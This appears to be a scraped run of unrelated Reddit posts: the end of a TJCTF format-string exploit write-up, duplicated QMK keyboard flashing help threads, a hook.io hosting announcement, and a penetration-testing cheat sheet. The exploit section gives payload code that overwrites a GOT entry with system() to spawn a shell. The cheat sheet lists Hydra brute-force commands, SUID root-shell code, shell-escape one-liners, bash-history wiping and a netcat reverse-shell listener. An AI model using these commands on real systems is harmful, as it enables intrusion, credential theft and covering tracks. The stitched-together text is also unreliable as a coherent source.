The offset of specified symbol is 0x21b97, so now we have the base address when we want, but we still need to force the program not to close. Let’s investigate the code after we run our exploit. (I used IDA to decompile)
unsigned __int64 __fastcall get_message(char *a1, const char *a2) { // ... code before this is not relevant printf(a1, &s, a2); puts("===================="); for ( i = 0; i <= 5; ++i ) v4[i] = byte_401238[rand() % 62]; v5 = 0; puts("As a free trial user, please complete the following captcha for our monitoring purposes."); printf("Captcha: %s\n", v4); fgets(&s2, 7, stdin); if ( !strcmp(v4, &s2) ) { puts("Thank you for your cooperation..."); } else { memset(a1, 0, 0x80uLL); puts("Incorrect captcha, your message was removed from our database."); } return __readfsqword(0x28u) ^ v8; } 
After this function returns, the program closes. The simplest solution is to overwrite the GOT of a function that is called before the exit and return to the beginning of the program. As memset() is not used in the rest of the program let’s rewrite its GOT with 0x400DA0 (the address where the menu is printed and the interaction starts).
Crafting the payload is a little bit tricky, we are now on 64-bit and addresses has a lot of zero bytes, so we can’t add them at the beginning of our message because that would end the printf. We could add them at the end, but in my case I chosen to add them in the password buffer and use them from there.
After leaking the right offsets, we can craft the following vector that will leak libc and will overwrite [email protected].
# addresses memset_GOT = 0x602050 secure_service_ADDR = 0x400DA0 # payload that leaks libc and rewrite memset() GOT to secure_service() # write zeros at the first 4 bytes and the address in the last 4 # also, we will store the addresses where we write in the password buffer off = 22 # offset of password buffer leak_off = 65 # offset of __libc_start_main_ret on the stack payload = "%{}$n%{}${}p%{}$n".format(off + 1, leak_off, secure_service_ADDR, off) ... leaked_libc = stack_leak_address - 0x21b97 # calculate the base 
The next step is to get the shell. We see that memset() is called with our message as the first argument, so if we replace it with system() and add at the beginning of our message “sh || ”, then we will get a shell and the errors from the rest of the string will be ignored. So, let’s write the payload:
# payload that rewrites memset() GOT to system() write1 = (0xffff00000000 & system_ADDR) / 0x100000000 write2 = (0x0000ffff0000 & system_ADDR) / 0x10000 write3 = (0x00000000ffff & system_ADDR) # sort the writes in ascending order writes = [ (write1, p64(memset_GOT + 4)), (write2, p64(memset_GOT + 2)), (write3, p64(memset_GOT + 0)) ] writes.sort(key=lambda tup: tup[0]) print (writes) addresses = ''.join(x[1] for x in writes) write3 = writes[0][0] write2 = writes[1][0] write1 = writes[2][0] code = "sh || " payload = code + "%{}x%{}$hn%{}x%{}$hn%{}x%{}$hn".format(write3 - len(code), off, write2 - write3, off + 1, write1 - write2, off + 2) 
Running the full script will have great results:
Running the exploit
Flag: tjctf{4r3_f0rm47_57r1n65_63771n6_0ld_y37?}
Full solution: https://github.com/JustBeYou/ctfs/blob/mastetjctf2018/super_secure.py
And here we are, at the end of the journey. We pwned them all! TJCTF was a great experience with pretty interesting tasks that were beginner oriented, so I recommend it to any newcomer as the organizers did a really great job to assure a high quality CTF.
Don’t forget to subscribe and follow my Github for more wargames solutions and guides. Thanks for reading!
submitted by l1ttl3wh0 to securityCTF [link] [comments]

[HELP] KBD75 QMK flashing problems

FIXED Leaving this up so if someone searches they can find the solution. DO NOT USE ANY SPACES IN YOUR FILE NAME. Yes really, that's it. So wherever you save the .hex file for the layout do not use any spaces and you will not have this issue. Thanks a ton to yanfali for this simple solution. Once again proving that you have to be slightly smarter than your PC.
This is my first time trying to flash a keyboard, I followed all the steps found here KBD75 + QMK.
So after the first flash attempt with QMK Flasher I get this error message
"Choose .hexFlash When Ready dfu-programmer atmega32u4 erase --force Erasing flash... Success Checking memory from 0x0 to 0x6FFF... Empty. dfu-programmer atmega32u4 flash C:\Users\DaneG\Documents\KBD75 layout\kbd75hhkb.hex dfu-programmer 0.7.0 https://github.com/dfu-programmedfu-programmer Usage: dfu-programmer target[:usb-bus,usb-addr] command [options] [global-options] [file|data] global-options: --quiet --debug level (level is an integer specifying level of detail)
Global options can be used with any command and must come after the command and before any file or data value
command summary: launch [--no-reset] read [--force] [--bin] [(flash)|--user|--eeprom] erase [--force] [--suppress-validation] flash [--force] [(flash)|--user|--eeprom] [--suppress-validation] [--suppress-bootloader-mem] [--serial=hexdigits:offset] {file|STDIN} setsecure configure {BSB|SBV|SSB|EB|HSB} [--suppress-validation] data get {bootloader-version|ID1|ID2|BSB|SBV|SSB|EB| manufacturer|family|product-name| product-revision|HSB} getfuse {LOCK|EPFL|BOOTPROT|BODLEVEL|BODHYST| BODEN|ISP_BOD_EN|ISP_IO_COND_EN| ISP_FORCE} setfuse {LOCK|EPFL|BOOTPROT|BODLEVEL|BODHYST| BODEN|ISP_BOD_EN|ISP_IO_COND_EN| ISP_FORCE} data
additional details: launch: Launch from the bootloader into the main program using a watchdog reset. To jump directly into the main program use --no-reset. read: Read the program memory in flash and output non-blank pages in ihex format. Use --force to output the entire memory and --bin for binary output. User page and eeprom are selected using --user and --eprom erase: Erase memory contents if the chip is not blank or always with --force flash: Flash a program onto device flash memory. EEPROM and user page are selected using --eeprom|--user flags. Use --force to ignore warning when data exists in target memory region. Bootloader configuration uses last 4 to 8 bytes of user page, --force always required here. Note: version 0.6.1 commands still supported. An error occurred - please try again."
After this QMK Flasher allows me to try and flash the keyboard over and over even after unplugging and replugging the USB. My KBD75 does not light up or register keystrokes when plugged in, it seems like it is stuck in bootloader mode. It may be relevant that before installing the drivers my keyboard registers as 'ATm32UDFU'. After installing the drivers it is 'ATmega32u4'.
The KBDfans website says that these are R6 and the PCB is white, I haven't checked for the manual reset button on the PCB yet but I will start taking apart the keyboard after posting this to see if that will solve the issue. That same guide linked above mentioned that some KBD75 were only flashable with Bootmapper Client but when I tried to 'Download' the layout or 'Toggle Bootmapper' in the program I get this error message "Error opening ps2avrGB device: The specified device was not found". Not sure if this means my PCB won't work with Bootmapper Client or just the keyboard is already in bootloader so the program cannot detect the layout or put it into bootloader again. I have never used this program either but after the error message I have no tried to create a layout and flash it. Without being able to detect the keyboard I am not sure how to do it manually by just the rows and columns.
Sorry for the wall of text, any help would be much appreciated as my new board is now a pretty brick :).
TLDR; New KBD75 seems stuck in bootloader after first flash attempt with QMK Flasher. PC still detects it.
*UPDATE* I took apart the case and tried manually resetting the PCB. It doesn't change anything, once I reset it the PC detects the keyboard like usual and QMK Flasher lets me flash the keyboard again to no effect.
submitted by OleDaneBoy to MechanicalKeyboards [link] [comments]

[HELP!] error flashing KBD75. not working at all now.

I was trying to re-flash my KBD75 with a few macros and slightly changed layout, and now it completely stopped working (no lights or response at all)
I've tried flashing with the default .hex and still nothing.
This is what QMK says:
Choose .hexFlash Keyboard dfu-programmer atmega32u4 erase --force Erasing flash... Success Checking memory from 0x0 to 0x6FFF... Empty. dfu-programmer atmega32u4 flash E:\Alan\Programs\Keeb stuff\20180218qmk84.hex dfu-programmer 0.7.0 https://github.com/dfu-programmedfu-programmer Usage: dfu-programmer target[:usb-bus,usb-addr] command [options] [global-options] [file|data]
global-options: --quiet --debug level (level is an integer specifying level of detail) Global options can be used with any command and must come after the command and before any file or data value
command summary: launch [--no-reset] read [--force] [--bin] [(flash)|--user|--eeprom] erase [--force] [--suppress-validation] flash [--force] [(flash)|--user|--eeprom] [--suppress-validation] [--suppress-bootloader-mem] [--serial=hexdigits:offset] {file|STDIN} setsecure configure {BSB|SBV|SSB|EB|HSB} [--suppress-validation] data get {bootloader-version|ID1|ID2|BSB|SBV|SSB|EB| manufacturer|family|product-name| product-revision|HSB} getfuse {LOCK|EPFL|BOOTPROT|BODLEVEL|BODHYST| BODEN|ISP_BOD_EN|ISP_IO_COND_EN| ISP_FORCE} setfuse {LOCK|EPFL|BOOTPROT|BODLEVEL|BODHYST| BODEN|ISP_BOD_EN|ISP_IO_COND_EN| ISP_FORCE} data
additional details: launch: Launch from the bootloader into the main program using a watchdog reset. To jump directly into the main program use --no-reset. read: Read the program memory in flash and output non-blank pages in ihex format. Use --force to output the entire memory and --bin for binary output. User page and eeprom are selected using --user and --eprom erase: Erase memory contents if the chip is not blank or always with --force flash: Flash a program onto device flash memory. EEPROM and user page are selected using --eeprom|--user flags. Use --force to ignore warning when data exists in target memory region. Bootloader configuration uses last 4 to 8 bytes of user page, --force always required here. Note: version 0.6.1 commands still supported. An error occurred - please try again.
Have I killed it somehow? pls helpp
submitted by MrSupernonchalant to MechanicalKeyboards [link] [comments]

[QMK][HELP] New KBD75 can't flash

FIXED Leaving this up so if someone searches they can find the solution. DO NOT USE ANY SPACES IN YOUR FILE NAME. So wherever you save the .hex file of the keyboard layout do not use any spaces and you will not have any problems. Follow the guide linked below and you will not have any issues. Big thankyou to yanfali
This is my first time trying to flash a keyboard, I followed all the steps found here KBD75 + QMK.
So after the first flash attempt with QMK Flasher I get this error message
"Choose .hexFlash When Ready dfu-programmer atmega32u4 erase --force Erasing flash... Success Checking memory from 0x0 to 0x6FFF... Empty. dfu-programmer atmega32u4 flash C:\Users\DaneG\Documents\KBD75 layout\kbd75hhkb.hex dfu-programmer 0.7.0 https://github.com/dfu-programmedfu-programmer Usage: dfu-programmer target[:usb-bus,usb-addr] command [options] [global-options] [file|data] global-options: --quiet --debug level (level is an integer specifying level of detail)
Global options can be used with any command and must come after the command and before any file or data value
command summary: launch [--no-reset] read [--force] [--bin] [(flash)|--user|--eeprom] erase [--force] [--suppress-validation] flash [--force] [(flash)|--user|--eeprom] [--suppress-validation] [--suppress-bootloader-mem] [--serial=hexdigits:offset] {file|STDIN} setsecure configure {BSB|SBV|SSB|EB|HSB} [--suppress-validation] data get {bootloader-version|ID1|ID2|BSB|SBV|SSB|EB| manufacturer|family|product-name| product-revision|HSB} getfuse {LOCK|EPFL|BOOTPROT|BODLEVEL|BODHYST| BODEN|ISP_BOD_EN|ISP_IO_COND_EN| ISP_FORCE} setfuse {LOCK|EPFL|BOOTPROT|BODLEVEL|BODHYST| BODEN|ISP_BOD_EN|ISP_IO_COND_EN| ISP_FORCE} data
additional details: launch: Launch from the bootloader into the main program using a watchdog reset. To jump directly into the main program use --no-reset. read: Read the program memory in flash and output non-blank pages in ihex format. Use --force to output the entire memory and --bin for binary output. User page and eeprom are selected using --user and --eprom erase: Erase memory contents if the chip is not blank or always with --force flash: Flash a program onto device flash memory. EEPROM and user page are selected using --eeprom|--user flags. Use --force to ignore warning when data exists in target memory region. Bootloader configuration uses last 4 to 8 bytes of user page, --force always required here. Note: version 0.6.1 commands still supported. An error occurred - please try again."
After this QMK Flasher allows me to try and flash the keyboard over and over even after unplugging and replugging the USB. My KBD75 does not light up or register keystrokes when plugged in, it seems like it is stuck in bootloader mode. It may be relevant that before installing the drivers my keyboard registers as 'ATm32UDFU'. After installing the drivers it is 'ATmega32u4'.
The KBDfans website says that these are R6 and the PCB is white, I haven't checked for the manual reset button on the PCB yet but I will start taking apart the keyboard after posting this to see if that will solve the issue. That same guide linked above mentioned that some KBD75 were only flashable with Bootmapper Client but when I tried to 'Download' the layout or 'Toggle Bootmapper' in the program I get this error message "Error opening ps2avrGB device: The specified device was not found". Not sure if this means my PCB won't work with Bootmapper Client or just the keyboard is already in bootloader so the program cannot detect the layout or put it into bootloader again. I have never used this program either but after the error message I have no tried to create a layout and flash it. Without being able to detect the keyboard I am not sure how to do it manually by just the rows and columns.
Sorry for the wall of text, any help would be much appreciated as my new board is now a pretty brick :).
TLDR; New KBD75 seems stuck in bootloader after first flash attempt with QMK Flasher. PC still detects it.
*UPDATE* I took apart the case and tried manually resetting the PCB. It doesn't change anything, once I reset it the PC detects the keyboard like usual and QMK Flasher lets me flash the keyboard again to no effect.
submitted by OleDaneBoy to olkb [link] [comments]

I built a 100% open-source hosting platform for JavaScript microservices and webhooks, in Javascript. Ask me anything! Architectural write-up included.

Hello. I built a 100% open-source hosting platform for JavaScript microservices, in Javascript. Ask me anything!
The project: http://hook.io
The source code: http://github.com/bigcompany/hook.io
Built with: Node.js, CouchDB, and Github Gist. Node Package Manager modules are fully supported.
Architectural details can be found a bit further down.
Interested, but too busy to read this now?
If you'd like, you can run the following Curl command to opt-in to our mailing list. We'll periodically send you updates about the project.
curl [email protected]
Replace [email protected] with your email address.
What is the purpose of hook.io?
hook.io is an open-source hosting platform for webhooks and microservices. The microservice architectural style is an approach to developing a single application as a suite of small services, each running in its own process and communicating with lightweight mechanisms. hook.io provides an easy way to create, host, and share microservices. Through developing many small re-usable microservices, you can reduce the complexity of your applications while improving stability.
Why or how would I want to use hook.io?
You should want to use hook.io if it can make your life as a developer easier.
The most basic use-case for hook.io is quick and free webhook hosting. You can instantly create a simple hook which parses the incoming parameters of an HTTP request and performs arbitrary actions on it. For instance: Send an SMS message every-time the Hook is requested as a webpage. Since NPM is supported, you can re-use any existing library from the extensive NPM module repository. You can also configure Hooks to be executed on a schedule using a Cron pattern.
At this point, we will take note that Hooks are fully streaming. Inside your Hook source code you have direct access to Node's http.IncomingMessage and httpServer.ServerResponse request and response streams. This means you can treat the inside of a Hook the exact same way as if it were inside a streaming middleware in a regular node http server. Having direct access to these streams is extremely useful and I am unsure if any other microservice hosting providers currently offer this feature.
More advanced use-cases for hook.io would be replacing individual parts of your application with microservices. Instead of adding a new route or module to your application , you could instead create a Hook responsible for only one unit of functionality and call it using a regular HTTP request from inside your existing application. One specific example could be building a Hook with a custom theme which acts perfectly as a stand-alone sign-up form. This sign-up form can then be loaded server-side in your application using one HTTP get request. It might sound complicated at first, but integrating microservices with your existing application is actually very easy. In the upcoming weeks we'll work on releasing specific guides for separating application functionalities into microservices.
An even more advanced usage would be building a suite of Hooks and composing them to create new and unique applications! Since every Hook understands Standard In and Standard Out and Hooks can easily call other Hooks from inside each other, there are an endless amount of combinations to be made. This composability enables the foundation for Flow-based Programming without imposing any specific rules for composition. A specific example could be building a Hook ( called "tar" ) responsible for taking in STDIN and streaming out a compressed tar file. Once this Hook is created, you could easily pipe the results of another Hook ( such as an image downloader ) into the "tar" Hook. These Hooks don't exist yet, but I am certain someone will build them in the near future.
Unix Pipes!
hook.io is very friendly with Unix Pipes. Using STDOUT and STDIN you can connect hook.io to your existing Unix Tool chain. The best way to explain this concept is to review the Curl examples.
Here is one specific example of using hook.io to flip a cat upside-down with cat and curl. You will need to provide your own cat.png
cat cat.png | curl -F 'degrees=180' -F '[email protected];type=image/png' http://hook.io/Marak/image/rotate > upsidedown-cat.png
The Data!
If you noticed in the last example, hook.io is fully capable of streaming binary data. It also supports streaming file uploads, multipart form uploads, and will assist in parsing all incoming form fields, JSON, and query string data.
Software Architecture
The core software architecture of hook.io is Resource-View-Presenter ( RVP ).
Resources are created using the npm resource module.
View-Presenters are created using the npm view module with regular HTML, CSS, and JavaScript. The same View-Presenter pattern is also used to implement custom theming for Hooks see: hook.io/themes
Important dependencies
mschema - Provides validation through-out the entire stack.
big - Small application framework. Provides website app which hook.io extends.
resource-http - Provides core HTTP server API. Helps in configuring Express with middlewares like Passport
resource-mesh - Provides a distributed event emitter mesh using a star network topography. hook.io primarily uses this module as a monitoring agent to report status back to our monitoring sink.
resource-user - Provides basic user API ( signups / logins / encrypted passwords / password resets / etc )
Server Architecture
There is one front-facing HTTP server and any number of Hook Workers.
The front-facing server is responsible for serving static content, maintaining user session data, and piping requests between the client and Worker.
Workers are responsible for executing user-submitted source code and piping their responses through the front-facing server to the client.
At this point, we will take note that communication between the Hook and client remains streaming throughout the entire architecture. This gives hook.io the ability to perform complex tasks like transcoding large video streams without worrying about clogging up any parts of the system with large memory buffers.
Hook Servers and Hook Workers are immutable and stateless to ensure stability of the platform. They are designed to fail fast and restart fast. mon is used as a process supervisor.
This architecture can theoretically scale to upwards of 10,000 concurrent connections. Realistically, it will probably be closer to 4,000. When the site needs to scale past this, we will create several front-facing servers and load balance incoming HTTP requests to them using DNS.
Hook and User configuration data are stored in a CouchDB database. If the database grows too large, we will split it into several smaller database severs sharded by the first alphabetic letter of every document's primary key.
Source code for Hooks is currently stored on Github as Github Gists. I'd imagine sometime in the future we will add the option to store and edit source code directly on hook.io itself. The project is open-source, so you could be the first to open up the issue!
Questions? Comments? Feedback?
Let me know! Open-source projects get better with collaboration. Every comment and piece of feedback counts.
Maybe take five minutes to try the platform out? You might like it!
The dependency tree for hook.io is re-used in many applications. Several of these dependencies I maintain myself. If you have feedback or comments about any specific dependency let me know!
submitted by _Marak_ to javascript [link] [comments]

noob friendly notes part 2

Recon and Enumeration

nmap -v -sS -A -T4 target - Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
nmap -v -sS -p--A -T4 target - As above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target - As above but scans all TCP ports and UDP scan (takes even longer)
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X - Nmap script to scan for vulnerable SMB servers - WARNING: unsafe=1 may cause knockover

SMB enumeration

ls /usshare/nmap/scripts/* | grep ftp - Search nmap scripts for keywords
nbtscan 192.168.1.0/24 - Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip - Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

nbtscan

nbtscan -v - Displays the nbtscan version
nbtscan -f target(s) - This shows the full NBT resource record responses for each machine scanned, not a one line summary, use this options when scanning a single host
nbtscan -O file-name.txt target(s) - Sends output to a file
nbtscan -H - Generate an HTTP header
nbtscan -P - Generate Perl hashref output, which can be loaded into an existing program for easier processing, much easier than parsing text output
nbtscan -V - Enable verbose mode
nbtscan -n - Turns off this inverse name lookup, for hanging resolution
nbtscan -p PORT target(s) - This allows specification of a UDP port number to be used as the source in sending a query
nbtscan -m - Include the MAC (aka "Ethernet") addresses in the response, which is already implied by the -f option.

Other Host Discovery

netdiscover -r 192.168.1.0/24 - Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you're on the right VLAN at $client site

SMB Enumeration

nbtscan 192.168.1.0/24 - Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip - Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

Python Local Web Server

python -m SimpleHTTPServer 80 - Run a basic http server, great for serving up shells etc

Mounting File Shares

mount 192.168.1.1:/vol/share /mnt/nfs - Mount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass ,domain=blah //192.168.1.X/share-name /mnt/cifs - Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
net use Z: \win-server\share password /user:domain\janedoe /savecred /p:no - Mount a Windows share on Windows from the command line
apt-get install smb4k -y - Install smb4k on Kali, useful Linux GUI for browsing SMB shares

Basic Finger Printing

nc -v 192.168.1.1 25 - telnet 192.168.1.1 25 - Basic versioning / finger printing via displayed banner

SNMP Enumeration

nmpcheck -t 192.168.1.X -c public snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName | cut -d* * -f
snmpenum -t 192.168.1.X
onesixtyone -c names -i hosts

DNS Zone Transfers

nslookup -> set type=any -> ls -d blah.com - Windows DNS zone transfer
dig axfr blah.com @ns1.blah.com - Linux DNS zone transfer

DNSRecon

dnsrecon -d TARGET -D /usshare/wordlists/dnsmap.txt -t std --xml ouput.xml

HTTP / HTTPS Webserver Enumeration

nikto -h 192.168.1.1 - Perform a nikto scan against target
dirbuster - Configure via GUI, CLI input doesn't work most of the time

Packet Inspection

tcpdump tcp port 80 -w output.pcap -i eth0 - tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

python /usshare/doc/python-impacket-doc/examples /samrdump.py 192.168.XXX.XXX - Enumerate users from SMB
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt - RID cycle SMB / enumerate users from SMB

SNMP User Enumeration

snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25 |cut -d” “ -f4 - Enmerate users from SNMP
python /usshare/doc/python-impacket-doc/examples/ samrdump.py SNMP 192.168.X.XXX - Enmerate users from SNMP
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt (then grep) - Search for SNMP servers with nmap, grepable output

Passwords

/usshare/wordlists - Kali word lists

Brute Forcing Services

Hydra FTP Brute Force

hydra -l USERNAME -P /usshare/wordlistsnmap.lst -f 192.168.X.XXX ftp -V - Hydra FTP brute force

Hydra POP3 Brute Force

hydra -l USERNAME -P /usshare/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V - Hydra POP3 brute force

Hydra SMTP Brute Force

hydra -P /usshare/wordlistsnmap.lst 192.168.X.XXX smtp -V - Hydra SMTP brute force

Password Cracking

John The Ripper - JTR
john --wordlist=/usshare/wordlists/rockyou.txt hashes - JTR password cracking
john --format=descrypt --wordlist /usshare/wordlists/rockyou.txt hash.txt - JTR forced descrypt cracking with wordlist
john --format=descrypt hash --show - JTR forced descrypt brute force cracking

Exploit Research

searchsploit windows 2003 | grep -i local - Search exploit-db for exploit, in this example windows 2003 + local esc
site:exploit-db.com exploit kernel <= 3 - Use google to search exploit-db.com for exploits
grep -R "W7" /usshare/metasploit-framework /modules/exploit/windows/* - Search metasploit modules using grep - msf search sucks a bit

Linux Penetration Testing Commands

Linux Network Commands

netstat -tulpn - Show Linux network ports with process ID's (PIDs)
watch ss -stplu - Watch TCP, UDP open ports in real time with socket summary.
lsof -i - Show established connections.
macchanger -m MACADDR INTR - Change MAC address on KALI Linux.
ifconfig eth0 192.168.2.1/24 - Set IP address in Linux.
ifconfig eth0:1 192.168.2.3/24 - Add IP address to existing network interface in Linux.
ifconfig eth0 hw ether MACADDR - Change MAC address in Linux using ifconfig.
ifconfig eth0 mtu 1500 - Change MTU size Linux using ifconfig, change 1500 to your desired MTU.
dig -x 192.168.1.1 - Dig reverse lookup on an IP address.
host 192.168.1.1 - Reverse lookup on an IP address, in case dig is not installed.
dig @192.168.2.2 domain.com -t AXFR - Perform a DNS zone transfer using dig.
host -l domain.com nameserver - Perform a DNS zone transfer using host.
nbtstat -A x.x.x.x - Get hostname for IP address.
ip addr add 192.168.2.22/24 dev eth0 - Adds a hidden IP address to Linux, does not show up when performing an ifconfig.
tcpkill -9 host google.com - Blocks access to google.com from the host machine.
echo "1" > /proc/sys/net/ipv4/ip_forward - Enables IP forwarding, turns Linux box into a router - handy for routing traffic through a box.
echo "8.8.8.8" > /etc/resolv.conf - Use Google DNS.

System Information Commands

Useful for local enumeration.

whoami - Shows currently logged in user on Linux.
id - Shows currently logged in user and groups for the user.
last - Shows last logged in users.
mount - Show mounted drives.
df -h - Shows disk usage in human readable output.
echo "user:passwd" | chpasswd - Reset password in one line.
getent passwd - List users on Linux.
strings /uslocal/bin/blah - Shows contents of none text files, e.g. whats in a binary.
uname -ar - Shows running kernel version.
PATH=$PATH:/my/new-path - Add a new PATH, handy for local FS manipulation.
history - Show bash history, commands the user has entered previously.

Redhat / CentOS / RPM Based Distros

cat /etc/redhat-release - Shows Redhat / CentOS version number.
rpm -qa - List all installed RPM's on an RPM based Linux distro.
rpm -q --changelog openvpn - Check installed RPM is patched against CVE, grep the output for CVE.

YUM Commands

Package manager used by RPM based systems, you can pull #some usefull information about installed packages and #or install additional tools.

yum update - Update all RPM packages with YUM, also shows whats out of date.
yum update httpd - Update individual packages, in this example HTTPD (Apache).
yum install package - Install a package using YUM.
yum --exclude=package kernel* update - Exclude a package from being updates with YUM.
yum remove package - Remove package with YUM.
yum erase package - Remove package with YUM.
yum list package - Lists info about yum package.
yum provides httpd - What a packages does, e.g Apache HTTPD Server.
yum info httpd - Shows package info, architecture, version etc.
yum localinstall blah.rpm - Use YUM to install local RPM, settles deps from repo.
yum deplist package - Shows deps for a package.
yum list installed | more - List all installed packages.
yum grouplist | more - Show all YUM groups.
yum groupinstall 'Development Tools' - Install YUM group.

Debian / Ubuntu / .deb Based Distros

cat /etc/debian_version - Shows Debian version number.
cat /etc/*-release - Shows Ubuntu version number.
dpkg -l - List all installed packages on Debian / .deb based Linux distro. Linux User Management
useradd new-user - Creates a new Linux user.
passwd username - Reset Linux user password, enter just passwd if you are root.
deluser username - Remove a Linux user.

Linux Decompression Commands

How to extract various archives (tar, zip, gzip, bzip2 #etc) on Linux and some other tricks for searching #inside of archives etc.

unzip archive.zip - Extracts zip file on Linux.
zipgrep *.txt archive.zip - Search inside a .zip archive.
tar xf archive.tar - Extract tar file Linux.
tar xvzf archive.tar.gz - Extract a tar.gz file Linux.
tar xjf archive.tar.bz2 - Extract a tar.bz2 file Linux.
tar ztvf file.tar.gz | grep blah - Search inside a tar.gz file.
gzip -d archive.gz - Extract a gzip file Linux.
zcat archive.gz - Read a gz file Linux without decompressing.
zless archive.gz - Same function as the less command for .gz archives.
zgrep 'blah' /valog/maillog*.gz - Search inside .gz archives on Linux, search inside of compressed log files.
vim file.txt.gz - Use vim to read .txt.gz files (my personal favorite).
upx -9 -o output.exe input.exe - UPX compress .exe file Linux.

Linux Compression Commands

zip -r file.zip /di* - Creates a .zip file on Linux.
tar cf archive.tar files - Creates a tar file on Linux.
tar czf archive.tar.gz files - Creates a tar.gz file on Linux.
tar cjf archive.tar.bz2 files - Creates a tar.bz2 file on Linux.
gzip file - Creates a file.gz file on Linux.

Linux File Commands

df -h blah - Display size of file / dir Linux.
diff file1 file2 - Compare / Show differences between two files on Linux.
md5sum file - Generate MD5SUM Linux.
md5sum -c blah.iso.md5 - Check file against MD5SUM on Linux, assuming both file and .md5 are in the same dir.
file blah - Find out the type of file on Linux, also displays if file is 32 or 64 bit.
dos2unix - Convert Windows line endings to Unix / Linux.
base64 < input-file > output-file - Base64 encodes input file and outputs a Base64 encoded file called output-file.
base64 -d < input-file > output-file - Base64 decodes input file and outputs a Base64 decoded file called output-file.
touch -r ref-file new-file - Creates a new file using the timestamp data from the reference file, drop the -r to simply create a file.
rm -rf - Remove files and directories without prompting for confirmation.

Samba Commands

Connect to a Samba share from Linux.

$ smbmount //serveshare /mnt/win -o user=username,password=password1 $ smbclient -U user \\server\share $ mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share

Breaking Out of Limited Shells

Credit to G0tmi1k for these (or wherever he stole them from!).

The Python trick:

python -c 'import pty;pty.spawn("/bin/bash")' echo os.system('/bin/bash') /bin/sh -i

Misc Commands

init 6 - Reboot Linux from the command line.
gcc -o output.c input.c - Compile C code.
gcc -m32 -o output.c input.c - Cross compile C code, compile 32 bit binary on 64 bit Linux.
unset HISTORYFILE - Disable bash history logging.
rdesktop X.X.X.X - Connect to RDP server from Linux.
kill -9 $$ - Kill current session.
chown user:group blah - Change owner of file or dir.
chown -R user:group blah - Change owner of file or dir and all underlying files / dirs - recersive chown.
chmod 600 file - Change file / dir permissions, see Linux File System Permissons for details.
Clear bash history - $ ssh [email protected] | cat /dev/null > ~/.bash_history

Linux File System Permissions

777 rwxrwxrwx No restriction, global WRX any user can do anything.
755 rwxr-xr-x Owner has full access, others can read and execute the file.
700 rwx------ Owner has full access, no one else has access.
666 rw-rw-rw- All users can read and write but not execute.
644 rw-r--r-- Owner can read and write, everyone else can read.
600 rw------- Owner can read and write, everyone else has no access.

Linux File System

/ - also know as "slash" or the root.
/bin - Common programs, shared by the system, the system administrator and the users.
/boot - Boot files, boot loader (grub), kernels, vmlinuz
/dev - Contains references to system devices, files with special properties.
/etc - Important system config files.
/home - Home directories for system users.
/lib - Library files, includes files for all kinds of programs needed by the system and the users.
/lost+found - Files that were saved during failures are here.
/mnt - Standard mount point for external file systems.
/media - Mount point for external file systems (on some distros).
/net - Standard mount point for entire remote file systems - nfs.
/opt - Typically contains extra and third party software.
/proc - A virtual file system containing information about system resources.
/root - root users home dir.
/sbin - Programs for use by the system and the system administrator.
/tmp - Temporary space for use by the system, cleaned upon reboot.
/usr -Programs, libraries, documentation etc. for all user-related programs.
/var - Storage for all variable files and temporary files created by users, such as log files, mail queue, print spooler. Web servers, Databases etc.

Linux Interesting Files / Dir’s

Places that are worth a look if you are attempting to #privilege escalate / perform post exploitation.

Directory Description

/etc/passwd - Contains local Linux users.
/etc/shadow - Contains local account password hashes.
/etc/group - Contains local account groups.
/etc/init.d/ - Contains service init script - worth a look to see whats installed.
/etc/hostname - System hostname.
/etc/network/interfaces - Network interfaces.
/etc/resolv.conf - System DNS servers.
/etc/profile - System environment variables.
~/.ssh/ - SSH keys.
~/.bash_history - Users bash history log.
/valog/ - Linux system log files are typically stored here.
/vaadm/ - UNIX system log files are typically stored here.
/valog/apache2/access.log & /valog/httpd/access.log - Apache access log file typical path.
/etc/fstab - File system mounts.

Compiling Exploits

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.
process.h, string.h, winbase.h, windows.h, winsock2.h - Windows exploit code
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h - Linux exploit code

Build Exploit GCC

gcc -o exploit exploit.c - Basic GCC compile

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

gcc -m32 exploit.c -o exploit - Cross compile 32 bit binary on 64 bit Linux

Compile Windows .exe on Linux

i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe - Compile windows .exe on Linux

SUID Binary

Often SUID C binary files are required to spawn a shell #as a superuser, you can update the UID / GID and shell #as required.

below are some quick copy and pate examples for #various #shells:

SUID C Shell for /bin/bash

int main(void){ setresuid(0, 0, 0); system("/bin/bash"); }

SUID C Shell for /bin/sh

int main(void){ setresuid(0, 0, 0); system("/bin/sh"); }

Building the SUID Shell binary

gcc -o suid suid.c
gcc -m32 -o suid suid.c - for 32bit

Setup Listening Netcat

Your remote shell will need a listening netcat instance #in order to connect back.

Set your Netcat listening shell on an allowed port

Use a port that is likely allowed via outbound firewall #rules on the target network, e.g. 80 / 443

To setup a listening netcat instance, enter the #following:

[email protected]:~# nc -nvlp 80 nc: listening on :: 80 ... nc: listening on 0.0.0.0 80 ...

NAT requires a port forward

If you're attacking machine is behing a NAT router, #you'll need to setup a port forward to the attacking #machines IP / Port.

